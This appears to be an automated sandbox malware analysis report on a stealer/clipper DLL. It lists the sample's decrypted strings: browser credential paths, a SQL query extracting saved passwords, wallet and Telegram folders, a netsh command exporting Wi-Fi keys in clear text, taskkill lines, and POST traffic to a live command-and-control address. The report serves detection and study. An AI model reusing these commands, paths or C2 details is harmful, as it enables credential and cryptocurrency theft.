185.215.113.217	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.217/CoreOPT/index.php	true		unknown

AV Detection

Sample uses string decryption to hide its real strings

Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: 185.215.113.217
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: /CoreOPT/index.php
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: S-%lu-
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Mozilla\Firefox\Profiles\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \logins.json
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Exodus\exodus.wallet\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Exodus
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Electrum(
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: electrum_data\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum.exe
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Armory\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Armory
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM ArmoryQt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Dogecoin\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dogecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Litecoin\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Litecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM litecoin-qt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: DashCore\wallets\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dashcore
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM dash-qt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Telegram(
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \emoji
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \user_data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \dictionaries
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Telegram
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Telegram.exe
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Desktop.zip
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Files_\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: atomic\Local Storage\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Atomic
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM "Atomic Wallet.exe" /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: configs
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chrome
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Google\Chrome\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Google\Chrome\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Opera Software\Opera Stable\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Opera Software\Opera Stable\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Microsoft\Edge\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Microsoft\Edge\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Sputnik
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \SputnikLab\Sputnik\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \SputnikLab\Sputnik\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chromium
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chromium\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chromium\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Orbitum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Orbitum\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Orbitum\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Vivaldi
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Vivaldi\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Vivaldi\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Comodo
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Comodo\Dragon\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Comodo\Dragon\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: CocCoc
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CocCoc\Browser\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CocCoc\Browser\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chedot
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chedot\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chedot\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: CentBrowser
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CentBrowser\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CentBrowser\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: netsh wlan export profile name=
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: folder=
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: key=clear
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: S-%lu-
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Exodus
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Armory\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Armory
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Dogecoin\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dogecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Litecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dashcore
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \emoji
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Telegram
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Files_\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Atomic
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: configs
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chrome
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Sputnik
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chromium
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Orbitum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Vivaldi
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Comodo
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: CocCoc
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chedot
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: folder=

Uses 32bit PE files

Source: uLV6jN2BWh.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: uLV6jN2BWh.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB9BCEE FindFirstFileExW,

7_2_6FB9BCEE

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.217 80

Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_6FB91EC0

Source: unknown

Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php)
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php/J
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php4
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php5Y
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpV
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpdY
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpl
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/NF1d

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB931B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

7_2_6FB931B0

Contains functionality to read the clipboard data

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB931B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

7_2_6FB931B0

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB931B0		7_2_6FB931B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FBA1AB1		7_2_6FBA1AB1

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6FB96B05 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6FB973B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6FB95D90 appears 103 times

Uses 32bit PE files

Source: uLV6jN2BWh.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: classification engine

Classification label: mal56.evad.winDLL@18/0@0/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03

Source: uLV6jN2BWh.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: uLV6jN2BWh.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: uLV6jN2BWh.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 2307	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 7688	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1015	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 8983	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep count: 2307 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep time: -2307000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep count: 7688 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep time: -7688000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep count: 1015 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep time: -1015000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep count: 8983 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep time: -8983000s >= -30000s	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB9BCEE FindFirstFileExW,

7_2_6FB9BCEE

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: rundll32.exe, 0000000A.00000002.4530873570.0000000000778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8q8q
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.0000000000778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX@

Anti Debugging

Found potential dummy code loops (likely to delay analysis)

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 42% for more than 60s

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB97288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_6FB97288

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB9A254 mov eax, dword ptr fs:[00000030h]		7_2_6FB9A254
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB9B881 mov eax, dword ptr fs:[00000030h]		7_2_6FB9B881

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB9D218 GetProcessHeap,

7_2_6FB9D218

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB96B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_6FB96B1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB97288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6FB97288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB99820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6FB99820

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.217 80

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1

Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB970A7 cpuid

7_2_6FB970A7

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB973F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_6FB973F8

ID:	1542876
Product:	CloudBasic
Start time:	19:12:51
Start date:	26.10.2024
Sample:	uLV6jN2BWh.dll
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	9fcac34b8162651f29288e1ffff9394d
SHA1:	68f2eb355162fbe260c6f7256d2a13fa5e6227d0
SHA256:	61e770436568881a68dc2c4db3e84f33a89f5d7068f5988582c133cbe7c9519c
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Windows Analysis Report
uLV6jN2BWh.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report uLV6jN2BWh.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
uLV6jN2BWh.dll